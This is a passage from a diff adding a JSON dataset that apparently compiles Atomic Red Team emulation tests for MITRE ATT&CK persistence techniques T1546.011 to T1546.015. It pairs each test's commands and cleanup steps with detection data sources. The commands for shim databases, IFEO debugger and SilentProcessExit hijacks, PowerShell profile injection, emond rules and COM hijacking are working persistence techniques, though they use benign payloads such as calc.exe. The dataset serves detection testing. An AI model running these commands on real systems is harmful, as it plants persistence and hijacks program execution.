database\n\nhttps://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Copy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb\nCopy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb\n", + "cleanup_command": "Remove-Item C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb -ErrorAction Ignore\nRemove-Item C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Registry key creation and/or modification events for SDB", + "auto_generated_guid": "9b6a06f9-ab5e-4e8d-8289-1df4289db02f", + "description": "Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing\nthe registry keys that were created. These keys can also be viewed using the Registry Editor.\n\nhttps://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "New-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\nNew-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\n", + "cleanup_command": "Remove-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\" -Name \"AtomicRedTeamT1546.011\" -ErrorAction Ignore\nRemove-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\" -Name \"AtomicRedTeamT1546.011\" -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.012", + "command_list": [ + "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\calc.exe\" /v Debugger /d \"#{payload_binary}\"\n", + "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v Debugger /d \"C:\\Windows\\System32\\cmd.exe\"\n", + "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" /v GlobalFlag /t REG_DWORD /d 512\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v ReportingMode /t REG_DWORD /d 1\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v MonitorProcess /d \"#{payload_binary}\"\n", + "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v GlobalFlag /t REG_DWORD /d 512\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v ReportingMode /t REG_DWORD /d 1\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v MonitorProcess /d \"C:\\Windows\\System32\\cmd.exe\"\n" + ], + "commands": [ + { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\calc.exe\" /v Debugger /d \"#{payload_binary}\"\n", + "source": "atomics/T1546.012/T1546.012.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Image File Execution Options Injection" + }, + { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v Debugger /d \"C:\\Windows\\System32\\cmd.exe\"\n", + "source": "atomics/T1546.012/T1546.012.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Image File Execution Options Injection" + }, + { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\" /v GlobalFlag /t REG_DWORD /d 512\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v ReportingMode /t REG_DWORD /d 1\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\" /v MonitorProcess /d \"#{payload_binary}\"\n", + "source": "atomics/T1546.012/T1546.012.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Image File Execution Options Injection" + }, + { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v GlobalFlag /t REG_DWORD /d 512\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v ReportingMode /t REG_DWORD /d 1\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v MonitorProcess /d \"C:\\Windows\\System32\\cmd.exe\"\n", + "source": "atomics/T1546.012/T1546.012.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Image File Execution Options Injection" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.012", + "display_name": "Event Triggered Execution: Image File Execution Options Injection", + "atomic_tests": [ + { + "name": "IFEO Add Debugger", + "auto_generated_guid": "fdda2626-5234-4c90-b163-60849a24c0b8", + "description": "Leverage Global Flags Settings\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_binary": { + "description": "Binary To Attach To", + "type": "Path", + "default": "calc.exe" + }, + "payload_binary": { + "description": "Binary To Execute", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v Debugger /d \"#{payload_binary}\"\n", + "cleanup_command": "reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v Debugger /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "IFEO Global Flags", + "auto_generated_guid": "46b1f278-c8ee-4aa5-acce-65e77b11f3c1", + "description": "Leverage Global Flags Settings\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "target_binary": { + "description": "Binary To Attach To", + "type": "Path", + "default": "notepad.exe" + }, + "payload_binary": { + "description": "Binary To Execute", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v GlobalFlag /t REG_DWORD /d 512\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v ReportingMode /t REG_DWORD /d 1\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v MonitorProcess /d \"#{payload_binary}\"\n", + "cleanup_command": "reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v GlobalFlag /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v ReportingMode /f >nul 2>&1\nreg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v MonitorProcess /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1546.013", + "command_list": [ + "Add-Content #{ps_profile} -Value \"\"\nAdd-Content #{ps_profile} -Value \"Start-Process calc.exe\"\npowershell -Command exit\n", + "Add-Content $profile -Value \"\"\nAdd-Content $profile -Value \"Start-Process #{exe_path}\"\npowershell -Command exit\n" + ], + "commands": [ + { + "command": "Add-Content #{ps_profile} -Value \"\"\nAdd-Content #{ps_profile} -Value \"Start-Process calc.exe\"\npowershell -Command exit\n", + "source": "atomics/T1546.013/T1546.013.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: PowerShell Profile" + }, + { + "command": "Add-Content $profile -Value \"\"\nAdd-Content $profile -Value \"Start-Process #{exe_path}\"\npowershell -Command exit\n", + "source": "atomics/T1546.013/T1546.013.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: PowerShell Profile" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.013", + "display_name": "Event Triggered Execution: PowerShell Profile", + "atomic_tests": [ + { + "name": "Append malicious start-process cmdlet", + "auto_generated_guid": "090e5aa5-32b6-473b-a49b-21e843a56896", + "description": "Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_path": { + "description": "Path the malicious executable", + "type": "Path", + "default": "calc.exe" + }, + "ps_profile": { + "description": "Powershell profile to use", + "type": "String", + "default": "$profile" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Ensure a powershell profile exists for the current user\n", + "prereq_command": "if (Test-Path #{ps_profile}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Path #{ps_profile} -Type File -Force\n" + } + ], + "executor": { + "command": "Add-Content #{ps_profile} -Value \"\"\nAdd-Content #{ps_profile} -Value \"Start-Process #{exe_path}\"\npowershell -Command exit\n", + "cleanup_command": "$oldprofile = cat $profile | Select-Object -skiplast 1\nSet-Content $profile -Value $oldprofile\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.014", + "command_list": [ + "sudo cp \"PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist\" /etc/emond.d/rules/T1546.014_emond.plist\nsudo touch /private/var/db/emondClients/T1546.014\n" + ], + "commands": [ + { + "command": "sudo cp \"PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist\" /etc/emond.d/rules/T1546.014_emond.plist\nsudo touch /private/var/db/emondClients/T1546.014\n", + "source": "atomics/T1546.014/T1546.014.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Emond" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.014", + "display_name": "Event Triggered Execution: Emond", + "atomic_tests": [ + { + "name": "Persistance with Event Monitor - emond", + "auto_generated_guid": "23c9c127-322b-4c75-95ca-eff464906114", + "description": "Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "plist": { + "description": "Path to attacker emond plist file", + "type": "Path", + "default": "PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist" + } + }, + "executor": { + "command": "sudo cp \"#{plist}\" /etc/emond.d/rules/T1546.014_emond.plist\nsudo touch /private/var/db/emondClients/T1546.014\n", + "cleanup_command": "sudo rm /etc/emond.d/rules/T1546.014_emond.plist\nsudo rm /private/var/db/emondClients/T1546.014\n", + "name": "sh", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.015", + "command_list": [ + "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value 'Apartment' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value $env:TEMP\\AtomicTest.dll\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'", + "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value 'MSAA AccPropServices'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "$o= [activator]::CreateInstance([type]::GetTypeFromCLSID(\"9BA05972-F6A8-11CF-A442-00A0C90A8F39\"))\n$item = $o.Item()\n$item.Document.Application.ShellExecute(\"cmd.exe\",\"/c calc.exe\",\"C:\\windows\\system32\",$null,0)\n" + ], + "commands": [ + { + "command": "New-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}' -Value '#{clsid_description}'\nNew-Item -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Value #{dllpath}\nNew-ItemProperty -Path 'HKCU:\\SOFTWARE\\Classes\\CLSID\\#{clsid}\\InprocServer32' -Name 'ThreadingModel' -Value 'Apartment' -PropertyType \"String\"\nStart-Process -FilePath \"C:\\Windows\\System32\\RUNDLL32.EXE\" -ArgumentList '-sta #{clsid}'", + "source": "atomics/T1546.015/T1546.015.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Component Object Model Hijacking" + }, + { + "command": "New-Item -Path 